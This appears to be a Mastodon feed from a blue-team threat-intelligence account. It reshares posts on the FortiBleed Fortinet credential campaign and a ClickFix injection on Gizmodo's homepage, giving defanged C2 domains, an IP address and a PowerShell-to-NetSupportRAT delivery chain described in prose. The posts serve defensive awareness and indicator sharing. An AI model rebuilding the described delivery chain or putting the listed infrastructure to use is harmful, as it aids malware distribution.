Saltmyhash

@[email protected]
38 Followers
338 Following
780 Posts
Blue team. #cti #threat_hunting #ioc #reverseengineering #threatintelligence #soc #malware
Saltmyhash22h ago
Catalin Cimpanu1d ago

The threat actor who exploited Fortinet devices to steal VPN authentication hashes in a series of attacks known as FortiBleed has also launched attacks against Microsoft SQL database servers and Sophos firewalls

A known initial access broker has taken credit for the campaign in a dark web forum post

https://unit42.paloaltonetworks.com/large-scale-credential-attacks/

Saltmyhash1d ago
Tommy M (TheAnalyst)2d ago

RE: https://infosec.exchange/@briankrebs/116780029181293028

Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate to. Inject is in main response.
ErrTraffic C2 cdnpro-987[.]xyz (Resoved via #EtherHiding)
PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
NetSupport C2 178[.]16[.]55[.]191.

TA also has a Mac payload configured, but it seems broken at the moment and ask for a password of some zip file when executed 🤷

Note: ErrTraffic is a ClickFIx-as-a-Service, so other compromised sites can lead to other malware from other affiliates.

Saltmyhash1d ago
Show threadKevin Beaumont1d ago

RE: https://infosec.exchange/@Ffforward/116780837774853850

IoCs on the Gizmodo compromise.

Saltmyhash2d ago
BrianKrebs2d ago

Don't look now, but it seems Gizmodo's homepage is now serving up a Clickfix attack.

Basics of the Click-Fix exploit, which causes a pasted URL to fetch malware via Windows Powershell.

https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/

#clickfix #gizmodo

Saltmyhash3d ago
Tobias Klausmann4d ago

I have very conflicting feelings about this :D

#electronics #repair #righttorepair

Saltmyhash4d ago

SourceForged in Fire

#UntrustworthyWebsitesATVShow
#HashtagGames

Saltmyhash4d ago
IFIN - The Independent Federated Intelligence Network4d ago

Etherhiding is so hot right now. When your malware sample contains blockchain artifacts, learn how to pivot on them and get all the indicators from the campaign.

https://ifin-intel.org/blog/etherhiding/

Etherhiding: Hunting and Prevention | IFIN

So your malware sample pivoted to the blockchain. Learn how to follow the transactions and get the IOCs you need.

Saltmyhash4d ago
IFIN - The Independent Federated Intelligence Network4d ago

RE: https://infosec.exchange/@ifin/116765684572417559

Courtesy of @gayint, a comprehensive domain list is now available:

https://blog.gayint.org/intel/fortibleed.txt

Saltmyhash4d ago
Jerry 🦙💝🦙4d ago

Mastodon 4.6 released today. It lets me force 2FA on accounts.

Also, heads up, I am going to force 2FA on accounts.

Note: this is only applicable to: infosec.exchange
infosec.space
ioc.exchange
convo.casa

Saltmyhash4d ago
Kevin Beaumont5d ago

An ecrime group has somehow gained access to 75k Fortinet firewall devices - dubbed Fortibleed

Blog https://www.infostealers.com/article/fortibleed-75000-fortinet-firewalls-compromised-global-enterprises-exposed-claim-your-ethical-disclosure/

Check if your domain is impacted: https://www.hudsonrock.com/fortinet

I’ve verified the data is real. They’ve been dumping the Fortinet config - not sure how yet - and then cracking the passwords it appears. Data is being resold online. #fortibleed